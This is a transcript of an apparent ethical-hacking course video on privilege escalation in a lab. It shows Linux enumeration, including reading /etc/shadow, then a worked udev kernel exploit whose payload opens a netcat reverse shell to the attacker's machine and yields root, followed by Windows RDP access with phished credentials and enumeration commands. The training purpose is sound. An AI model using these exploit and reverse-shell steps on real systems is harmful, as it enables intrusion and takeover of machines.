1 00:00:00,150 --> 00:00:06,330 So privilege escalation: when you first compromise a box, you know, you're going to notice that you
2 00:00:06,330 --> 00:00:12,390 may already have administrative rights, but, you know, if you don't, you know, what you need to
3 00:00:12,390 --> 00:00:14,570 do is something called privilege escalation.
4 00:00:14,790 --> 00:00:22,020 So pretty much this is just the act of trying to gain access, which we would call root for Linux or SYSTEM
5 00:00:22,020 --> 00:00:23,550 access for Windows.
6 00:00:23,760 --> 00:00:30,240 So this is going to make you like a super admin on the box, and then you can do what you want, pretty much.
7 00:00:30,300 --> 00:00:31,730 So that's really the goal.
8 00:00:31,740 --> 00:00:36,720 So I'm going to show you guys just, like, some different commands that you can run, like, after you've
9 00:00:36,720 --> 00:00:37,560 already compromised.
10 00:00:37,570 --> 00:00:43,270 Those are, like, for Linux and Windows, and give you an example of privilege escalation.
11 00:00:43,830 --> 00:00:49,590 OK, guys, so back in our Kali Linux machine and others, you can go over some of the basic steps
12 00:00:49,590 --> 00:00:56,200 of gathering information on a Linux machine, you know, figure out what's going on with this account
13 00:00:56,200 --> 00:00:57,480 and learn about the system.
14 00:00:57,680 --> 00:01:02,100 What you're going to do is send different commands so that you can enumerate information and be able
15 00:01:02,100 --> 00:01:06,780 to figure out how exactly you're going to escalate your privileges, because you need to find some
16 00:01:06,780 --> 00:01:07,710 type of weakness.
17 00:01:07,980 --> 00:01:09,890 So to do that, you need to find out about the system.
18 00:01:10,140 --> 00:01:11,750 So let's just go through some commands.
19 00:01:11,760 --> 00:01:15,990 So one of the first commands you can do is just figure out a little bit more about your user, and the
20 00:01:15,990 --> 00:01:16,870 way that you can do that...
21 00:01:16,890 --> 00:01:20,400 Right now, we're in the msfadmin account that we compromised before.
22 00:01:21,330 --> 00:01:24,360 You can create another account if you want; it's up to you.
23 00:01:25,470 --> 00:01:26,880 You just do that with the useradd
24 00:01:26,880 --> 00:01:31,530 command, and use that account. It's kind of up to you, especially when you've compromised a box.
25 00:01:31,530 --> 00:01:32,150 You do what you want.
26 00:01:33,180 --> 00:01:37,680 So, but one of the first things we can do, learning a little bit more about the user and groups and
27 00:01:37,680 --> 00:01:42,600 such, like the type of privileges they have, is type id, and you get a little bit more.
28 00:01:43,410 --> 00:01:46,050 We see, like, you know, different groups and such over here.
29 00:01:46,320 --> 00:01:50,450 And we can kind of get a little bit more of an idea about what's going on with this user.
30 00:01:50,730 --> 00:01:56,670 So also, if you want to learn more about users on the system, you remember the shadow file in Linux.
31 00:01:56,670 --> 00:02:04,170 So we could do cat /etc/shadow, and see, we don't have access for that.
32 00:02:04,170 --> 00:02:06,840 So maybe we can do it if we're lucky.
33 00:02:07,230 --> 00:02:10,800 So, OK, sudo cat /etc/shadow.
34 00:02:11,880 --> 00:02:15,130 msfadmin, and we can learn a little bit more.
35 00:02:15,150 --> 00:02:21,870 We see that there's different users on here, and now we can enumerate a little bit more, like figure out,
36 00:02:21,870 --> 00:02:24,440 hey, you know, which of these users are built in on here.
37 00:02:25,410 --> 00:02:26,840 There's different users now.
38 00:02:26,850 --> 00:02:28,750 So now we know what's on the system.
39 00:02:28,760 --> 00:02:30,480 Maybe we have some new targets or something.
40 00:02:31,560 --> 00:02:35,640 And also, like you saw how it said permission denied, that will happen.
41 00:02:35,640 --> 00:02:38,820 Like in the real world, you may not actually have admin rights.
42 00:02:39,510 --> 00:02:42,880 So you have to be ready for, you know, not being able to print out this file.
43 00:02:43,050 --> 00:02:44,190 So that's very normal.
44 00:02:44,400 --> 00:02:45,730 But it doesn't matter.
45 00:02:45,750 --> 00:02:46,950 You just keep on enumerating.
46 00:02:46,980 --> 00:02:51,120 So one of the things we could do, we could type hostname and just hit enter.
47 00:02:51,450 --> 00:02:53,700 Now we know a little bit more about the hostname.
48 00:02:55,380 --> 00:02:59,450 So if we do cat /etc/issue, so that's the issue file here.
49 00:03:00,300 --> 00:03:06,110 This is going to give us a little bit more information about the system in general.
50 00:03:06,390 --> 00:03:12,420 So we've kind of seen this whenever we go and telnet, and it shows kind of this right here
51 00:03:12,720 --> 00:03:15,690 and gives us, like, information right there for logging in.
52 00:03:15,690 --> 00:03:19,420 You know, we already have that, but you'll see different things on different systems.
53 00:03:19,440 --> 00:03:22,050 This is just Metasploitable and how it's set up.
54 00:03:22,890 --> 00:03:29,640 So what you can also do is cat /etc/*-release.
55 00:03:31,080 --> 00:03:34,840 And it's going to give you a little more information about the distribution of Linux.
56 00:03:34,880 --> 00:03:40,080 So this is Ubuntu 8.04, which is way behind.
57 00:03:40,920 --> 00:03:46,860 So now we know, hey, this is a pretty old distribution of Ubuntu; maybe there's some exploits out
58 00:03:46,860 --> 00:03:52,890 there, so we can go look up exploits specifically, you know, for 8.04 to maybe escalate
59 00:03:52,890 --> 00:03:53,520 privileges.
60 00:03:53,850 --> 00:04:00,960 Another thing that we can do is uname -a, and this is going to pretty much give us the kernel
61 00:04:00,960 --> 00:04:02,730 version and architecture.
62 00:04:02,730 --> 00:04:04,020 And this is very important.
63 00:04:04,830 --> 00:04:10,460 You know, when you're... I would say that this is one of the more... one of the commands that you want to
64 00:04:10,470 --> 00:04:15,690 run, and it's going to give you an idea, because it's out there: privilege escalation for specific
65 00:04:15,690 --> 00:04:19,190 kernels of Linux, and for this one, I believe that there is as well.
66 00:04:19,260 --> 00:04:20,700 So it's really important to do that.
67 00:04:21,210 --> 00:04:25,170 So another command you could do is ps aux.
68 00:04:25,770 --> 00:04:32,720 And this is going to pretty much just print out the different processes that are running and the users
69 00:04:32,740 --> 00:04:33,360 running them.
70 00:04:33,810 --> 00:04:38,130 And it's just kind of in a readable format, so you can kind of see.
71 00:04:38,410 --> 00:04:44,250 So what we're going to do, what you would typically do, is look through these, maybe see something
72 00:04:44,290 --> 00:04:48,180 of interest, and then you can look into it a little bit more.
73 00:04:48,900 --> 00:04:54,750 What we know we're going to take advantage of is this one right here, which is udev, this,
74 00:04:54,750 --> 00:04:55,980 the udev process.
75 00:04:56,340 --> 00:04:57,190 We're going to take a look.
76 00:04:57,270 --> 00:04:59,190 We're going to take advantage of that in a little bit.
77 00:04:59,820 --> 00:05:04,440 But let's continue enumerating, because you don't want to stop just because you found one potential point
78 00:05:04,440 --> 00:05:04,930 of attack.
79 00:05:05,220 --> 00:05:09,240 You can probably attack a lot of these different processes that are running.
80 00:05:09,510 --> 00:05:14,670 So you just go through and do your research, write down things, take notes, and then start to look
81 00:05:14,670 --> 00:05:17,460 up, like, hey, exploits for this, exploits for that.
82 00:05:17,860 --> 00:05:19,350 That's kind of like what you would do.
83 00:05:20,070 --> 00:05:27,260 So we can also type in ip a, just a little bit of IP information, see what interfaces are on the system.
84 00:05:28,590 --> 00:05:35,280 We can also do /sbin/route, and this is going to show us the routing table.
85 00:05:35,290 --> 00:05:36,800 There's not going to be too much here.
86 00:05:36,930 --> 00:05:41,010 You know, this is a small virtual network, so it's not too big of a deal.
87 00:05:41,640 --> 00:05:49,460 We can list out, you know, the network connections right now, just ss -anp, and we can look at
88 00:05:49,500 --> 00:05:54,840 here and see what kind of network connections are made right now, see what systems it's connected to,
89 00:05:54,840 --> 00:06:00,060 maybe enumerate a little bit more, you know, about the network or about how this system specifically
90 00:06:00,660 --> 00:06:01,140 acts.
91 00:06:01,830 --> 00:06:07,260 One other thing that we can do is /etc/cron.daily.
92 00:06:08,890 --> 00:06:12,990 Oh, we can change over to that directory.
93 00:06:13,530 --> 00:06:21,480 So let's change over there, ls -la, and we can see, like, the different crontabs, which are just automated
94 00:06:21,480 --> 00:06:24,870 jobs that run at a specified interval on Linux.
95 00:06:25,170 --> 00:06:30,960 So we can maybe check out some of those, see what's going on and see who's running them, and maybe take
96 00:06:30,960 --> 00:06:33,570 advantage of those, put our own commands in there.
97 00:06:34,410 --> 00:06:39,720 And then there's also, like, a cron.weekly directory as well, on top of the daily one.
98 00:06:39,730 --> 00:06:45,510 So check both of those out, and then we can cat /etc/crontab.
99 00:06:46,410 --> 00:06:51,030 And this will show us, you know, what crontabs are actually set to run and stuff like that.
100 00:06:51,060 --> 00:06:54,060 So very, very useful information.
101 00:06:54,540 --> 00:07:00,540 Cron jobs are definitely a way that people are able to take advantage of systems.
102 00:07:00,540 --> 00:07:05,820 So you definitely want to know, like, what tasks are on here
103 00:07:06,030 --> 00:07:11,280 and happening, in particular as a privileged user like admin, etc.
104 00:07:11,900 --> 00:07:16,790 And they might have, you know, insecure permissions, so some of them you can take advantage of. One other
105 00:07:16,790 --> 00:07:26,540 thing that we can do is dpkg -l, and this is just going to list out all the installed packages.
106 00:07:26,780 --> 00:07:29,810 And so you see that there's versions and names and stuff.
107 00:07:29,810 --> 00:07:34,640 So we can definitely use this to find maybe some privilege escalation vulnerabilities.
108 00:07:34,880 --> 00:07:39,080 So you can look through these and try to figure out some things.
109 00:07:39,080 --> 00:07:42,590 You see versions, names of services and stuff.
110 00:07:42,600 --> 00:07:44,870 So definitely something to take advantage of.
111 00:07:45,080 --> 00:07:49,530 OK, so now we know how to enumerate a little bit more for Linux escalation.
112 00:07:49,610 --> 00:07:53,660 So let's actually try some escalation out for Linux.
113 00:07:53,930 --> 00:07:56,180 So we're going to go back to that
114 00:07:56,180 --> 00:08:02,930 uname -a command, and we see the kernel for Linux.
115 00:08:02,960 --> 00:08:05,090 OK, so that's what we see.
116 00:08:05,240 --> 00:08:09,890 So it's very important to take note of that: 2.6.24-16.
117 00:08:09,900 --> 00:08:11,210 So we know that that's there.
118 00:08:11,690 --> 00:08:12,750 That's going to be very important.
119 00:08:12,770 --> 00:08:17,600 So let's do a ps aux, and then we're going to grep for
120 00:08:17,600 --> 00:08:23,420 udev. Remember I brought up udev earlier, so this is going to print out all the services, like all those
121 00:08:23,540 --> 00:08:28,360 currently running processes, and then it's only going to show us lines that have udev in it.
122 00:08:28,380 --> 00:08:31,480 That's what it does, if you don't remember from the Linux basics.
123 00:08:32,420 --> 00:08:39,790 So as we can see right here, this one is running as root right here, the udevd daemon.
124 00:08:40,130 --> 00:08:46,400 So this is what we're going to try to take advantage of, because we know that specifically, that we
125 00:08:46,400 --> 00:08:48,140 already know that there's an exploit.
126 00:08:48,140 --> 00:08:49,460 You could have just done research on it.
127 00:08:49,460 --> 00:08:52,860 But we know that this actually, for this kernel version...
128 00:08:53,210 --> 00:09:01,090 So what we can do is actually go to our Kali machine, open up another tab, and we could just do a
129 00:09:01,100 --> 00:09:06,810 searchsploit, and then we could type udev and see what comes up.
130 00:09:07,790 --> 00:09:12,610 So we're going to look at this one in particular right here.
131 00:09:13,190 --> 00:09:19,700 It says Linux Kernel 2.6, 8.10 / 9.04.
132 00:09:20,060 --> 00:09:23,000 udev less than version 1.4.1.
133 00:09:23,330 --> 00:09:27,350 So we know that it actually falls into this criteria.
134 00:09:27,360 --> 00:09:29,130 So that's the one that we want to use.
135 00:09:29,690 --> 00:09:40,400 So what we can do is just searchsploit -m and then 8572.
136 00:09:40,850 --> 00:09:44,080 And that's going to copy it into our current directory, already over here.
137 00:09:44,690 --> 00:09:45,680 So there we go.
138 00:09:45,980 --> 00:09:50,890 But you can see we can just open it up then and actually take a look at the exploit.
139 00:09:51,860 --> 00:09:55,250 So this gives us an idea of the exploit, what's going on here.
140 00:09:55,460 --> 00:09:58,450 It tells us how to use it, information about it.
141 00:09:59,030 --> 00:10:04,790 So it says, hey, udev before version 1.4.1 doesn't verify whether a Netlink message
142 00:10:04,790 --> 00:10:11,630 originates from kernel space, which allows local users to gain privileges by sending a message from
143 00:10:11,630 --> 00:10:12,130 user space.
144 00:10:12,130 --> 00:10:16,350 So that's the explanation of what's going on, and then how to use it.
145 00:10:16,370 --> 00:10:18,790 So what we're going to have to do is pass the process
146 00:10:18,800 --> 00:10:25,220 ID, as it says right there, of the Netlink socket, and it tells you where that's listed at, and we're going
147 00:10:25,220 --> 00:10:26,450 to go through and do all this.
148 00:10:27,050 --> 00:10:32,720 We're going to pass it in when we run, when we run the exploit, and then the exploit is going to run
149 00:10:33,320 --> 00:10:39,140 something, a file that we create, like a script, that we're going to call a payload, that's located at
150 00:10:39,140 --> 00:10:42,910 this /tmp/run path on the target machine.
151 00:10:43,340 --> 00:10:45,390 So that's what we're going to do.
152 00:10:45,410 --> 00:10:46,880 So let's get out of here.
153 00:10:48,290 --> 00:10:49,220 So quit.
154 00:10:49,550 --> 00:10:59,360 So what we want to do is actually copy this file over to the Metasploitable machine, and we
155 00:10:59,360 --> 00:11:01,790 can do that with something called secure copy.
156 00:11:02,000 --> 00:11:06,140 And the command for this is just scp.
157 00:11:06,740 --> 00:11:12,050 And then we put the file name, 8572.c, and then we're going to put the username.
158 00:11:12,060 --> 00:11:17,450 So msfadmin, for that... msfadmin.
159 00:11:18,160 --> 00:11:26,090 And then the IP address, 192.168.56.104.
160 00:11:26,510 --> 00:11:34,460 And then to actually, you know, complete the scp command, we're going to put a colon and then a
161 00:11:34,460 --> 00:11:38,680 forward slash, and then we're going to just put those into the /tmp directory there.
162 00:11:38,780 --> 00:11:43,730 So just to go over the command again really quickly: we're doing secure copy, or copying this file
163 00:11:43,730 --> 00:11:45,400 right here, which is the 8572.c file.
164 00:11:45,410 --> 00:11:46,240 It's the udev one.
165 00:11:46,850 --> 00:11:54,170 We are going to use this account, msfadmin, at this address, which is the Metasploitable box.
166 00:11:54,440 --> 00:11:59,840 And then we're putting it into the /tmp directory, and it's going to ask for the password.
167 00:12:00,520 --> 00:12:02,090 So it uses SSH for the most part.
168 00:12:03,560 --> 00:12:07,050 So you put your password in, msfadmin.
169 00:12:07,820 --> 00:12:08,380 There we go.
170 00:12:08,390 --> 00:12:08,780 Cool.
171 00:12:09,110 --> 00:12:09,860 There we go.
172 00:12:10,220 --> 00:12:11,240 So it transferred over.
173 00:12:11,320 --> 00:12:18,940 So now what we can do is actually go back over to our session that we have here, cd /tmp,
174 00:12:19,360 --> 00:12:21,070 and we already have some of the files here.
175 00:12:21,070 --> 00:12:22,360 But we're just going to do ls.
176 00:12:22,750 --> 00:12:27,880 And as you can see, we have 8572.c here now.
177 00:12:27,880 --> 00:12:29,460 So we just copied that over.
178 00:12:29,860 --> 00:12:39,850 So as you remember, it said that in the, in the directory, in the /tmp directory, we need to have
179 00:12:39,850 --> 00:12:40,900 a file called run.
180 00:12:41,170 --> 00:12:42,460 So the file is already there.
181 00:12:42,460 --> 00:12:43,930 But let's just check it out really quick.
182 00:12:44,200 --> 00:12:46,330 So vi run, and you could just type in
183 00:12:46,330 --> 00:12:47,800 vi run just to create the file.
184 00:12:50,090 --> 00:12:54,050 So, so now, so we have a miniature payload.
185 00:12:54,220 --> 00:12:55,470 So let's talk about what this does.
186 00:12:55,480 --> 00:13:02,380 So as we talked about before in the scripting section, bash scripts start with this pound sign and
187 00:13:02,380 --> 00:13:09,510 bang right here, to use the sh binary to, like, interpret this.
188 00:13:09,640 --> 00:13:14,410 So then what we're going to do is we're going to open up a netcat session.
189 00:13:15,580 --> 00:13:22,780 So this /bin/netcat opens up netcat, executes that binary, which, you know, netcat
190 00:13:22,780 --> 00:13:25,300 is used to connect and listen and such.
191 00:13:26,050 --> 00:13:32,980 And then the -e is telling it, hey, when you open up this session, execute the following binary,
192 00:13:32,980 --> 00:13:34,830 so it's going to open up netcat,
193 00:13:35,620 --> 00:13:42,790 it's going to open up a shell, and then it's going to, you know, listen out to this address.
194 00:13:43,660 --> 00:13:52,210 So it's 192.168.56.107 over port 4444.
195 00:13:52,610 --> 00:14:01,770 So it's just like creating a shell that's going to go back to our system once we execute the exploit.
196 00:14:02,860 --> 00:14:10,840 So one thing you might also need to do is on your Kali machine, you might need to actually allow
197 00:14:10,840 --> 00:14:15,850 traffic from the whole entire segment to your machine, because it might not work.
198 00:14:16,410 --> 00:14:17,170 That's what I found.
199 00:14:17,230 --> 00:14:19,140 I was kind of developing this a little bit.
200 00:14:19,150 --> 00:14:21,790 So one thing you just do is sudo
201 00:14:21,880 --> 00:14:33,360 ufw status, sudo ufw allow from, and then just put 192.168.56.0/
202 00:14:33,370 --> 00:14:33,900 24.
203 00:14:33,910 --> 00:14:40,390 This will let all traffic come in from the subnet that we're on, so that you're not going to have issues.
204 00:14:40,390 --> 00:14:44,680 When you want to run the exploit, it's definitely something that you do.
205 00:14:44,860 --> 00:14:47,080 Kali machines are pretty locked down.
206 00:14:47,440 --> 00:14:51,430 So, so we have our run file in there.
207 00:14:51,430 --> 00:14:57,670 That's our payload that's going to execute and connect back out to our box, allow us to get the access
208 00:14:57,670 --> 00:14:58,230 that we need.
209 00:14:58,600 --> 00:15:03,160 So now we just need to figure out the Netlink process ID.
210 00:15:03,820 --> 00:15:06,010 So let's go ahead.
211 00:15:06,010 --> 00:15:07,070 And we're on the...
212 00:15:07,240 --> 00:15:09,070 We're on our machine.
213 00:15:09,280 --> 00:15:19,360 So let's cat /proc/net/netlink, and we're going to look for this number
214 00:15:19,360 --> 00:15:20,340 right here.
215 00:15:20,590 --> 00:15:24,970 So 2367, that's what we want right there.
216 00:15:25,780 --> 00:15:28,880 So let's take note of that number, our 2367.
217 00:15:28,900 --> 00:15:30,700 So we are in /tmp.
218 00:15:31,660 --> 00:15:34,180 We copied over the exploit.
219 00:15:34,180 --> 00:15:37,750 So one last thing that we need to do is actually compile the exploit.
220 00:15:37,990 --> 00:15:39,590 So what compiling does,
221 00:15:39,590 --> 00:15:41,410 it just turns it into an executable.
222 00:15:42,220 --> 00:15:49,810 So we're going to do gcc; this is what we can use to compile things on Linux for C programs,
223 00:15:50,050 --> 00:15:54,370 and then we're going to put 8572.c, and then let's do -o.
224 00:15:54,370 --> 00:15:57,400 Let's just call it udev_exploit.
225 00:15:59,410 --> 00:16:00,190 Let's do that.
226 00:16:00,940 --> 00:16:08,280 OK, so in that folder, we have our udev_exploit file, we have our run file, everything's compiled.
227 00:16:08,290 --> 00:16:11,050 We have the process ID, 2367.
228 00:16:11,260 --> 00:16:17,020 So what we need to do, actually before we run it, we actually need to start a netcat listener
229 00:16:17,020 --> 00:16:18,820 on our Kali Linux machine.
230 00:16:19,330 --> 00:16:26,100 So let's go ahead and just do nc -nlvp 4444.
231 00:16:26,560 --> 00:16:31,660 And this is going to allow us to listen on, you know, that port, which is the port that we put in
232 00:16:31,750 --> 00:16:32,640 the run file.
233 00:16:33,070 --> 00:16:38,500 So as you can see, just to go over really quickly again, it's going to reach out to our machine, execute
234 00:16:38,500 --> 00:16:41,040 a shell over this port right here.
235 00:16:41,650 --> 00:16:43,030 So cool.
236 00:16:43,570 --> 00:16:52,710 So now what we can do is ./udev_exploit 2367, bam, and let's go back over here.
237 00:16:52,720 --> 00:16:58,510 So now it says, hey, connected to, you know, 192.168.56.107 from .104.
238 00:16:58,840 --> 00:17:07,050 So let's see whoami, and we're root, and let's see hostname just to confirm it's Metasploitable.
239 00:17:07,160 --> 00:17:12,010 So now we just escalated our privileges, and we can do whatever we want on this system.
240 00:17:12,280 --> 00:17:18,680 So that's kind of like a quick walkthrough of what you would do to escalate your privileges on Linux.
241 00:17:19,310 --> 00:17:25,360 OK, so before we get into the Windows exploit, the Windows privilege escalation stuff, we need to set
242 00:17:25,360 --> 00:17:31,450 up the computers a little bit more so that they're a little more vulnerable and so that we can also, you
243 00:17:31,450 --> 00:17:32,550 know, be able to connect to them.
244 00:17:32,800 --> 00:17:37,330 So you want to make sure that you have certain features turned on on Windows 10.
245 00:17:37,600 --> 00:17:43,600 You can find this just by typing features into the search box and clicking on the "Turn Windows
246 00:17:43,600 --> 00:17:44,860 features on or off."
247 00:17:45,220 --> 00:17:54,640 And what we're going to want to make sure is that we have SMB 1.0/CIFS File Sharing Support on, SMB Direct on, Telnet
248 00:17:54,640 --> 00:17:58,640 Client, TFTP Client, just simple things that may or may not be on.
249 00:17:58,900 --> 00:18:00,860 It's going to be very helpful for what we're going to do.
250 00:18:01,180 --> 00:18:07,090 So once you select those, it'll turn them on, and you just hit OK, and then you'll be good to
251 00:18:07,090 --> 00:18:07,510 go.
252 00:18:09,040 --> 00:18:15,160 Another thing that we can do... you've got to have admin rights for all this stuff, too.
253 00:18:16,000 --> 00:18:18,450 But we also made it; we made the accounts here.
254 00:18:18,460 --> 00:18:24,190 So when we're hacking, we're imagining that we don't know this information, but right now we're setting
255 00:18:24,190 --> 00:18:24,480 it up.
256 00:18:25,510 --> 00:18:33,670 So you want to go over here to, under the system, just type in system here, click on the advanced system
257 00:18:33,670 --> 00:18:39,610 settings, click on Remote, and then make sure that you allow connections to the computer, Remote
258 00:18:39,610 --> 00:18:40,150 Desktop.
259 00:18:40,330 --> 00:18:41,040 That's how we're going to be...
260 00:18:41,350 --> 00:18:46,870 That's how we're going to connect to this computer, because we're imagining that we captured credentials
261 00:18:47,680 --> 00:18:53,260 from this machine, you know, with our spoofed login page, like we did before with our spoofing.
262 00:18:53,270 --> 00:18:58,090 So in this case, we're assuming that we have access to the system.
263 00:18:58,240 --> 00:18:59,470 We don't have admin rights.
264 00:18:59,470 --> 00:19:02,290 We just have the poor victim's account information.
265 00:19:02,920 --> 00:19:05,410 So that is what we're going to be doing right now.
266 00:19:05,440 --> 00:19:11,800 So one other thing that you can also do is actually set up some firewall rules if you want to.
267 00:19:11,800 --> 00:19:12,520 It's pretty simple.
268 00:19:12,520 --> 00:19:17,830 You just open up Windows Defender Firewall, new rule, click through, and just, like, allow all or
269 00:19:17,830 --> 00:19:19,480 something like that over certain ports.
270 00:19:20,200 --> 00:19:22,060 So you can do that if you want to as well.
271 00:19:22,150 --> 00:19:27,250 I believe you don't have to if you do the... these steps.
272 00:19:27,610 --> 00:19:35,140 Another way that you can do this is allowing an app through the firewall, and this is coming up with a
273 00:19:35,140 --> 00:19:37,050 list of stuff; you might actually have to do this step.
274 00:19:37,810 --> 00:19:42,400 So you have to be admin, of course, but you also want to make sure that you're allowing, like, Remote
275 00:19:42,400 --> 00:19:52,330 Desktop through over all these different profiles, allowing Remote Desktop through, and whatever else
276 00:19:52,330 --> 00:19:57,340 that we might need, like these types of file sharing or something, if it's on here.
277 00:19:57,610 --> 00:20:03,190 So anything you want to be able to get through the firewall, you want to put that here, and then you'll
278 00:20:03,190 --> 00:20:03,880 be good to go.
279 00:20:03,880 --> 00:20:06,490 Once you set that up, you should be able to connect up to the machine.
280 00:20:07,330 --> 00:20:11,060 So let's go ahead and try to connect from our Kali machine to the Windows machine.
281 00:20:11,170 --> 00:20:17,020 OK, so one other thing that we're going to need to do is actually allow ourselves, allow this account
282 00:20:17,020 --> 00:20:21,300 to be able to remote into the computer, just so that you don't run into any issues.
283 00:20:21,360 --> 00:20:29,890 What you're going to do, you go to the search box on the Windows 10 machine, just lusrmgr.msc, and
284 00:20:29,890 --> 00:20:33,070 then just hit enter. The thing's a little bit slower; it doesn't have so much RAM.
285 00:20:33,400 --> 00:20:39,580 But just do that and enter, and it is going to pop up with this window, and you're going to click on Groups,
286 00:20:40,120 --> 00:20:46,180 you know, click on, double click on Remote Desktop Users, Add, and then you can just type in poor and you
287 00:20:46,600 --> 00:20:49,840 probably hit enter and it'll, it'll, like, autocomplete.
288 00:20:49,960 --> 00:20:53,080 So I already added it; it's in the list, hit Apply.
289 00:20:54,440 --> 00:21:00,570 It says access denied, so I have to do this as an admin, so let's go back and exit out of this.
290 00:21:02,150 --> 00:21:12,090 And let's do lusrmgr.msc, see, right click it and run it as administrator.
291 00:21:12,980 --> 00:21:23,210 So this is the administrator account, administrator, and then the password for that account, and we can
292 00:21:23,250 --> 00:21:32,230 run this as an administrator, and then now we can add... so to the group, so add our victim to the group.
293 00:21:32,720 --> 00:21:34,100 So Check Names, and go.
294 00:21:34,110 --> 00:21:35,970 OK, Apply.
295 00:21:36,800 --> 00:21:41,060 OK, now we should be able to remote in, so let's go to the next machine.
296 00:21:41,240 --> 00:21:43,270 OK, so on our Kali Linux machine.
297 00:21:43,280 --> 00:21:49,550 So what we're going to do is the rdesktop command, pretty much just remote desktop for Linux, and then
298 00:21:49,550 --> 00:21:50,520 put the IP address of
299 00:21:50,540 --> 00:21:55,370 the Windows machine, enter, and it's going to come up with a nice pretty window for RDP.
300 00:21:55,530 --> 00:21:56,720 So we're going to do this.
301 00:21:56,720 --> 00:21:59,400 We're going to make sure we're logging into the domain.
302 00:21:59,450 --> 00:22:08,990 So ethicalhackinglab\, it's going to be a backslash, then we're going to put poorvictim and then
303 00:22:08,990 --> 00:22:10,120 the password.
304 00:22:11,810 --> 00:22:13,000 And so let us log in.
305 00:22:13,050 --> 00:22:14,790 So now we have access to the computer.
306 00:22:14,790 --> 00:22:15,710 So we phished them.
307 00:22:15,950 --> 00:22:17,840 We got his credentials.
308 00:22:18,170 --> 00:22:25,790 So we have access, and now we need to, you know, log in, figure out a little bit more, you know, about
309 00:22:25,790 --> 00:22:32,600 the network and what's going on on this computer as well, and see what we can figure out.
310 00:22:32,840 --> 00:22:35,660 OK, so we're inside of our Windows host.
311 00:22:36,380 --> 00:22:42,590 So what we're going to do is just go over some enumeration stuff for Windows to sort of get an idea
312 00:22:42,590 --> 00:22:45,540 of, you know, how to find something that might be vulnerable.
313 00:22:46,040 --> 00:22:51,680 So the first thing I want to do is open up a command prompt, and you can look around at some of the stuff
314 00:22:51,680 --> 00:22:55,480 in the GUI if you want, but we're going to get more bang for our buck in the command prompt.
315 00:22:55,670 --> 00:23:01,030 So I want to open up a PowerShell; it's a little more versatile, and a lot more powerful.
316 00:23:01,040 --> 00:23:05,060 So you just type in powershell.exe, and that's going to load up.
317 00:23:05,960 --> 00:23:07,400 So we have that loaded up.
318 00:23:07,940 --> 00:23:13,610 We can just start trying to learn things, so we could do, like, net user to learn a little bit more about,
319 00:23:13,610 --> 00:23:18,320 you know, the local user accounts here and see, you know, if there's any groups or anything, see
320 00:23:18,320 --> 00:23:20,270 what accounts are on the system.
321 00:23:20,870 --> 00:23:29,910 hostname, just like Linux, tells you the hostname; you can type in systeminfo and get a pretty
322 00:23:29,930 --> 00:23:36,520 large amount of different information about the system and figure out the distribution, figure out, you
323 00:23:36,530 --> 00:23:41,220 know, Windows 10 Enterprise, this build right here.
324 00:23:42,050 --> 00:23:46,340 This is definitely good information to let you know exactly...
325 00:23:46,490 --> 00:23:52,190 Hey, maybe this is a version of Windows that has a vulnerability; then I would go search for that.
326 00:23:53,420 --> 00:23:58,090 So another thing that we can do is actually look at the running processes right now.
327 00:23:58,100 --> 00:24:05,510 So tasklist and then /svc, and it's going to give you a list of different running processes right
328 00:24:05,510 --> 00:24:11,270 now by, by privileged users, but not for those users.
329 00:24:12,110 --> 00:24:13,850 So this is going to give you a good idea.
330 00:24:13,850 --> 00:24:16,460 What's running? Maybe you can find something that's vulnerable.
331 00:24:16,670 --> 00:24:22,130 You know, I would look around, maybe start doing some searching for some of these executables right
332 00:24:22,130 --> 00:24:24,380 here and see if they're potentially vulnerable.
333 00:24:25,370 --> 00:24:31,160 If you want to look at the networking information to get a lay of the land, learn a little bit more about
334 00:24:31,160 --> 00:24:37,310 the network, just do ipconfig /all; you can see all the interfaces and connections and everything.
335 00:24:37,490 --> 00:24:43,970 Another thing, if you want to learn a little bit more networking stuff, you can do route print and it's going to
336 00:24:43,970 --> 00:24:45,470 print the routing tables.
337 00:24:45,470 --> 00:24:51,140 So this is just pretty much an explanation of how packets get from one destination to another.
338 00:24:51,410 --> 00:24:52,010 Pretty much.
339 00:24:52,010 --> 00:24:54,320 So that's some good information.
340 00:24:54,320 --> 00:24:56,570 If you're trying to learn, you know, hey, what's the network like?
341 00:24:56,840 --> 00:25:04,110 We can also do a netstat command and this is going to allow us to view all of our active connections.
342 00:25:04,110 --> 00:25:11,420 So we do -ano, specifically, and this is going to give us the address, the port numbers
343 00:25:11,420 --> 00:25:17,660 and the process ID. So now we kind of have an idea, OK, these are the active TCP connections.
344 00:25:17,900 --> 00:25:18,560 These are the ports
345 00:25:18,560 --> 00:25:20,870 they're running on, these are the process IDs.
346 00:25:21,080 --> 00:25:25,840 Then you start to get a feel of, like, what's going on, you know, on this system.
347 00:25:26,060 --> 00:25:29,810 So another thing that's good to look at is to look at the firewall.
348 00:25:29,810 --> 00:25:32,740 You know, you want to see maybe what the rules are.
349 00:25:32,750 --> 00:25:42,120 So the first thing that we can do is do a netsh and then advfirewall and then show current
350 00:25:42,980 --> 00:25:43,730 profile.
351 00:25:45,230 --> 00:25:47,150 And it's going to show us the current profile.
352 00:25:47,160 --> 00:25:56,450 So we see that the domain profile is on and it tells us a little bit more about the
353 00:25:56,450 --> 00:25:57,260 firewall in general.
354 00:25:57,290 --> 00:26:01,530 So what we can also do to learn, like, the actual rules, if you wanted to.
355 00:26:01,750 --> 00:26:16,750 So I'm not going to enter it, so netsh, same thing, advfirewall firewall show rule name
356 00:26:17,170 --> 00:26:23,610 equals all.
357 00:26:23,630 --> 00:26:24,430 Yeah.
358 00:26:25,510 --> 00:26:26,330 So maybe so.
359 00:26:26,800 --> 00:26:31,230 So this is going to be a command that you can run and it's going to show you all the firewall rules.
360 00:26:31,240 --> 00:26:37,000 I don't want to do that because the last time I did it, it was like a million rules, but you can do that
361 00:26:37,000 --> 00:26:39,120 and get an idea of the different firewall rules.
362 00:26:39,130 --> 00:26:42,450 We could just go look at the firewall GUI and figure that out if we wanted to.
363 00:26:42,670 --> 00:26:44,270 We do have access in here.
364 00:26:44,860 --> 00:26:56,830 So another thing that we can do is schtasks /query /fo LIST /v, and this is going to show
365 00:26:56,830 --> 00:27:03,350 us the scheduled tasks, and it's going to display with verbose output.
366 00:27:03,370 --> 00:27:06,940 So just more output, much more information.
367 00:27:07,540 --> 00:27:11,970 So this is going to print a lot of stuff, just like the firewall rule command would have.
368 00:27:12,610 --> 00:27:17,530 So you can start to look through those if you want to start to get an idea of the different scheduled
369 00:27:17,530 --> 00:27:23,260 tasks and maybe take advantage of those; like cron jobs in Linux, you can kind of potentially take advantage
